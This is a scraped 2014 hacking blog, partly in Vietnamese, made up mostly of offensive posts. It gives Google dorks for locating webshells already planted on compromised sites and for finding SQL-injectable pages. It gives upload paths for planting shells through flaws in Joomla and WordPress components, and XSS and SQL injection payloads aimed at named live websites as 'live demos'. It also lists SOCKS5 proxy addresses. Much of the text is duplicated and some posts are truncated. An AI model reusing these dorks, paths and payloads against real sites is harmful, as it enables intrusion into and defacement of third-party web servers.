Friday, July 25, 2014
1-Footholds
*Google search: intitle:"WSO 2.4" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove
Submited: 2014-01-03
*Google search: intitle:"=[ 1n73ct10n privat shell ]="
Submited: 2014-01-03
*Google search: filetype:php intext:"!C99Shell v. 1.0 beta"
Submited: 2013-11-25
*Google search: intitle:"uploader by ghost-dz" ext:php
Submited: 2013-11-25
Monday, July 21, 2014
SQL 2014 DORK
SQL 2014 DORK SQL DORK 2014
Nguồn: CEH
trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
Nguồn: CEH
trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
Saturday, July 19, 2014
Exploit Joomla!: JCE
It has been a very long time that i haven't post here, so as for today i'm going to post a new tutorial on how to upload shell with method JCE.
Thing Required:
JCE Exploiter : DOWNLOAD
DORKS:
inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"
Exploit WordPress: Optin Pro - File Upload Vulnerability
Once again, i'm not gonna explain anything about this exploit since it is exactly the same as my previous post. So, i'm just gonna give you the dork and exploit.
DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/
EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php
SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php
DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/
EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php
SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php
Espacio Ecuador XSS & SQLI
Dork:
intext:"developed by Espacio Ecuador"
Exploits:
http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>
Live Demo:
SQLI:
http://www.galapagostraveline.com/deal.html?opc=31%27
XSS:
http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
Pej Studio & Nissi Infotech & Plante Graffix - XSS
Dork:
intext:"Created By Nissi Infotech"
Exploits:
http://target.com/name.php?id= [XSS & SQLI]
Live Demo:
http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
MyBB Kingchat - XSS
Dork:
inurl:/kingchat.php?
Exploit:
/kingchat.php?notic
Change that /... into this to see exploit:
/kingchat.php?chat=2&l=2
Then add your scripts...
Live Demo:
http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Pro-Service - XSS Vulnerability
Dorks:
intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"
Exploit:
/resume_list.php?id=
Live Demo:
http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Posted in: NEXUS.PRO.XSS
Joomla Aclassif - XSS
Dork:
inurl:"index.php?option=com_aclassif"
Exploit:
/index.php/component/aclassif/?
Example & Live Demo:
http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Joomla Collector Shell Uploader
Dork:
inurl:index.php?option=com_collector
Exploit:
/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
Live Demo:
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
ProActive CMS - XSS
Dork:
intext:"Powered by Proactive CMS"
Exploit:
/admin.php?action=newuser (XSS)
Live Demo:
http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Noname - Media - XSS
Dork:
intext:"powered by www.noname-media.com" inurl:"/view.php?id="
Exploit:
/view.php?id=
Live Demo:
http://www.rws-e.de/php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Cách xử lí khi lỡ quên mật khẩu router
Nếu không biết hoặc lỡ quên mật khẩu truy cập của bộ định tuyến (router), bạn có thể tìm và thiết lập lại bằng những cách sau.
Các bộ định tuyến hiện nay đều được truy xuất qua giao diện web và có tính năng bảo vệ bằng mật khẩu, trong đó, bạn có thể cấu hình các thiết lập kết nối mạng, kiểm soát của phụ huynh và chuyển tiếp cổng kết nối. Các mật khẩu mặc định này có thể được thay đổi để bảo vệ các thiết lập của bộ định tuyến.
Các bộ định tuyến hiện nay đều được truy xuất qua giao diện web và có tính năng bảo vệ bằng mật khẩu.
Tìm tên đăng nhập và mật khẩu mặc định của bộ định tuyến
Các bộ định tuyến hiện nay đều được truy xuất qua giao diện web và có tính năng bảo vệ bằng mật khẩu, trong đó, bạn có thể cấu hình các thiết lập kết nối mạng, kiểm soát của phụ huynh và chuyển tiếp cổng kết nối. Các mật khẩu mặc định này có thể được thay đổi để bảo vệ các thiết lập của bộ định tuyến.
Các bộ định tuyến hiện nay đều được truy xuất qua giao diện web và có tính năng bảo vệ bằng mật khẩu.
Tìm tên đăng nhập và mật khẩu mặc định của bộ định tuyến
Wednesday, July 9, 2014
Sock 5 Vip!! (9/7/2014)
103.247.157.3:16585
108.48.107.135:44414
109.67.169.50:8174
110.143.72.198:47235
111.94.197.159:6195
153.196.245.116:11803
166.159.133.167:22416
173.17.164.188:52133
173.23.165.114:35319
178.57.160.220:40045
185.22.18.62:59339
186.19.150.247:3945
193.110.219.32:24277
193.248.164.57:19731
108.48.107.135:44414
109.67.169.50:8174
110.143.72.198:47235
111.94.197.159:6195
153.196.245.116:11803
166.159.133.167:22416
173.17.164.188:52133
173.23.165.114:35319
178.57.160.220:40045
185.22.18.62:59339
186.19.150.247:3945
193.110.219.32:24277
193.248.164.57:19731
Monday, July 7, 2014
Sock 5 Vip!! (7/7/2014)
1.36.186.217:55102
103.247.157.3:8286
140.114.93.136:443
142.196.192.133:20516
146.115.155.232:22724
172.242.214.14:15728
173.54.97.239:31609
173.63.189.226:49876
173.81.122.168:49194
174.110.162.157:24982
174.64.169.104:45730
176.36.68.60:20222
177.35.211.203:58200
188.136.132.18:443
103.247.157.3:8286
140.114.93.136:443
142.196.192.133:20516
146.115.155.232:22724
172.242.214.14:15728
173.54.97.239:31609
173.63.189.226:49876
173.81.122.168:49194
174.110.162.157:24982
174.64.169.104:45730
176.36.68.60:20222
177.35.211.203:58200
188.136.132.18:443
Sunday, July 6, 2014
Sock 5 Vip!! (6/7/2014)
1.36.186.217:14720
100.0.104.180:34840
108.56.173.183:45021
121.209.173.112:32139
173.170.225.211:28769
173.63.189.226:39706
174.130.155.244:18337
178.216.3.134:33602
190.90.193.202:443
198.50.136.217:60088
199.193.153.72:3308
201.20.110.58:443
203.45.59.17:5987
100.0.104.180:34840
108.56.173.183:45021
121.209.173.112:32139
173.170.225.211:28769
173.63.189.226:39706
174.130.155.244:18337
178.216.3.134:33602
190.90.193.202:443
198.50.136.217:60088
199.193.153.72:3308
201.20.110.58:443
203.45.59.17:5987
Friday, July 4, 2014
Sock 5 Vip!! (4/7/2014)
119.231.131.26:47145
176.62.4.149:42363
178.248.82.86:14525
185.16.102.50:33701
185.16.102.50:57150
185.16.102.50:59077
188.26.122.252:43231
194.247.12.11:5791
194.247.12.11:5823
194.247.12.11:5847
194.247.12.11:5853
198.50.136.217:60088
204.116.27.155:35846
211.167.76.180:45372
24.1.9.252:40663
24.130.134.103:26929
46.165.193.67:6211
46.165.193.67:7529
46.165.193.67:7719
46.38.51.49:6147
46.38.51.49:6927
5.9.212.53:9544
60.34.190.139:7651
61.64.114.113:13952
67.49.90.215:3291
69.146.52.180:17621
75.179.9.177:37900
76.117.10.123:35344
76.184.212.177:17215
77.242.22.254:8741
78.61.105.77:52755
80.100.43.142:51325
80.86.106.110:1010
81.0.240.113:9050
82.66.128.242:40313
85.17.30.89:8252
91.185.215.141:5049
96.27.131.71:33819
97.80.60.62:25628
176.62.4.149:42363
178.248.82.86:14525
185.16.102.50:33701
185.16.102.50:57150
185.16.102.50:59077
188.26.122.252:43231
194.247.12.11:5791
194.247.12.11:5823
194.247.12.11:5847
194.247.12.11:5853
198.50.136.217:60088
204.116.27.155:35846
211.167.76.180:45372
24.1.9.252:40663
24.130.134.103:26929
46.165.193.67:6211
46.165.193.67:7529
46.165.193.67:7719
46.38.51.49:6147
46.38.51.49:6927
5.9.212.53:9544
60.34.190.139:7651
61.64.114.113:13952
67.49.90.215:3291
69.146.52.180:17621
75.179.9.177:37900
76.117.10.123:35344
76.184.212.177:17215
77.242.22.254:8741
78.61.105.77:52755
80.100.43.142:51325
80.86.106.110:1010
81.0.240.113:9050
82.66.128.242:40313
85.17.30.89:8252
91.185.215.141:5049
96.27.131.71:33819
97.80.60.62:25628
Thursday, July 3, 2014
MachForm Remote Shell Upload
=======================================================# [~] Exploit Title: MachForm RFU Bug
# [~] Google Dork (For RFU) : " Bottom Of The Exploit "
# [~] Date: 09/11/2012 (TU)
# [~] Exploit Author: Samim.s
# [~] Version: ALL Versions & ALL Languages
# [~] Tested on: Se7en & BT5
# [~] Support WebSite : MachForm.com
=======================================================
# [+] RFU Exploit :
# [~] Google Dork (For RFU) : " Bottom Of The Exploit "
# [~] Date: 09/11/2012 (TU)
# [~] Exploit Author: Samim.s
# [~] Version: ALL Versions & ALL Languages
# [~] Tested on: Se7en & BT5
# [~] Support WebSite : MachForm.com
=======================================================
# [+] RFU Exploit :
Namo WebEditor v5.0 Remote File Uploader
Dork:
inurl:/module/upload_image/
Example :
http://www.akcse.org/bbs/lib/module/upload_image/upform.phphttp://www.cgoa.ca/_new/bbs/lib/module/upload_image/upform.phphttp://luxbellate.com/mart/bbs/lib/module/upload_image/upform.phphttp://run.ksilbo.co.kr/bbs/bbs/lib/module/upload_image/upform.php
Tuesday, July 1, 2014
Sock 5 Vip!! (1/7/2014)
100.40.39.221:25351
139.130.180.93:42280
142.196.192.133:49723
162.156.150.39:38125
162.243.105.128:6170
173.167.143.29:42014
174.54.165.206:32093
184.1.104.81:16524
186.19.150.247:12637
188.219.199.250:5927
193.33.65.167:6947
194.247.12.11:6714
139.130.180.93:42280
142.196.192.133:49723
162.156.150.39:38125
162.243.105.128:6170
173.167.143.29:42014
174.54.165.206:32093
184.1.104.81:16524
186.19.150.247:12637
188.219.199.250:5927
193.33.65.167:6947
194.247.12.11:6714
[ADD ONS] Hacker ToolKit For Google Chrome
1- Web Developer
Web Developer is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.
Web Developer is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.
Subscribe to:
Posts (Atom)